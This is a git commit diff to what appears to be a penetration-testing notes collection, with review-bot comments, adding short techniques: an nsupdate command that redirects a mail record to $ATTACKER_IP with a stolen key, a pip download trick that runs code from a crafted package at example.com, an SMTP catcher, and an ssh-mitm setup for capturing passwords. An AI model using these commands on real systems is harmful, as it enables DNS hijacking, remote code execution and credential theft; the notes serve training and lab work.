This commit is contained in:
whackx 2023-05-12 19:15:13 +02:00
parent 840daf84da
commit b0b36adea5
5 changed files with 62 additions and 1 deletions


@ -23,3 +23,21 @@ send
quit quit
``` ```
* Check domain by querying the subdomain's A record via dig/drill/nslookup * Check domain by querying the subdomain's A record via dig/drill/nslookup
### Found Secrets for Keys
If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain.
```sh
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
Creating key...
namefromtext
keycreate
server <domain>
update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP
send
```
Copy the lines, every space counts as it has to be exactly like in the example
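Review bot: in the `sh` block, the lines `Creating key...`, `namefromtext` and `keycreate` are nsupdate's `-d` debug output, not input, yet the sentence below tells the reader to copy the lines exactly; either mark them as output or drop `-d` so the block contains only what is typed. The placeholders are also inconsistent: `server <domain>` is generic while the record line hardcodes `mail.snoopy.htb.` and `$ATTACKER_IP` is never defined, so use one placeholder style and say what each stands for. Wording: "If there is the possiblity of found secret for a key" reads better as "If the secret of a key (a TSIG key, which is what `-y` expects) is found, for example in `/etc/bind/named.conf`".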


@ -1,6 +1,6 @@
# Tips & Tricks for Binary Exploitations # Tips & Tricks for Binary Exploitations
# Toggle ASLR ## Toggle ASLR
State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch. State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch.
@ -39,3 +39,10 @@ echo -e '\xde\xad\xc0\xde' | xxd
## NULL bytes in Adresses ## NULL bytes in Adresses
NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes
## Read from running process
Read from a running process' stdout by attaching to the process via strace and read in the following way
```sh
strace -e read -p <ProcessId>
```
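Review bot: the heading and text promise the process's stdout, but `strace -e read -p <ProcessId>` traces `read()` calls, i.e. the data the process consumes from its file descriptors; output leaves via `write()`. Make the text match the syscall you actually want to observe, and document the precondition that attaching with `-p` requires owning the process plus a permissive `kernel.yama.ptrace_scope` (or CAP_SYS_PTRACE), since otherwise the attach fails. Also "Adresses" in the heading above should be "Addresses".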

Exploits/Python/Pip.md Normal file

@ -0,0 +1,12 @@
# PIP Exploits
## pip download
Python pip executes tar files after the download option has been triggered.
Therefore, a hand crafted python module needs to be created and build.
After that pip can be used in the following way
```sh
pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v
```
An in detail blog post has been done by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/)
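Review bot: "Python pip executes tar files" is imprecise; a tarball is data, and what runs is the package's own build/setup code, which pip invokes while processing the downloaded source distribution, so state that, since it is the whole point of the note. Document the flags as well: `--index-url http://…` together with `--trusted-host example.com` tells pip to skip HTTPS verification for that host, and `totally_not_malicious` and `example.com` are placeholders. Grammar: "created and build" should be "created and built", and "An in detail blog post" should be "A detailed blog post".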


@ -1,3 +1,10 @@
# SMTP # SMTP
* [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp) * [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp)
## Adhoc SMTP Server
Set up an SMTP Server quickly using `maildev`
```sh
sudo maildev -s 25 --ip $ATTACKER_IP
```
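Review bot: `$ATTACKER_IP` is used without being defined anywhere in the file; state that it is a placeholder for the address maildev should bind to. Document why `sudo` is needed (binding port 25 is privileged) and that maildev also starts its web interface by default, so note where that listens. "Adhoc" should be "Ad hoc".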


@ -1,5 +1,8 @@
# Man In the Middle # Man In the Middle
## Ettercap
* [Ettercap](https://www.ettercap-project.org/) * [Ettercap](https://www.ettercap-project.org/)
* [Bettercap](https://www.bettercap.org/) * [Bettercap](https://www.bettercap.org/)
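Review bot: the new `## Ettercap` heading now sits above both the Ettercap and the Bettercap link, so Bettercap is filed under Ettercap; either make the heading generic (e.g. `## Tools`) or move the Bettercap link into its own section.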
@ -19,6 +22,7 @@ if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n"); msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
} }
``` ```
* Escape double quote inside the payload string * Escape double quote inside the payload string
* compile via * compile via
```sh ```sh
@ -29,3 +33,16 @@ etterfilter filter.ef -o filter.ef
```sh ```sh
ettercap -T -i <interface> -M arp -F filter.ef ettercap -T -i <interface> -M arp -F filter.ef
``` ```
## mitm-server
Set up a local Man in the middle server which can be used for example for password looting if somebody logs in.
[SSH-MITM](https://docs.ssh-mitm.at/#) provides this feature. Therefore, download the package via `pip install ssh-mitm`.
Redirect the port to the mitm server and start it afterwards
```sh
((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &)
ssh-mitm server --remote-host $TARGET_IP
```
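Review bot: the socat line hardcodes `10.10.14.4:10022` while the next line uses `$TARGET_IP`; say that this address is the host running `ssh-mitm server` and that 10022 is the port it listens on, or use a variable for it too, otherwise a reader following the page forwards to the wrong host. The `((… &) &)` double-subshell detach is unexplained; a comment, or a plain `&`, would be clearer. Minor: the docs link ends in a stray `#`, and "Man in the middle" in the text does not match the heading's "Man In the Middle".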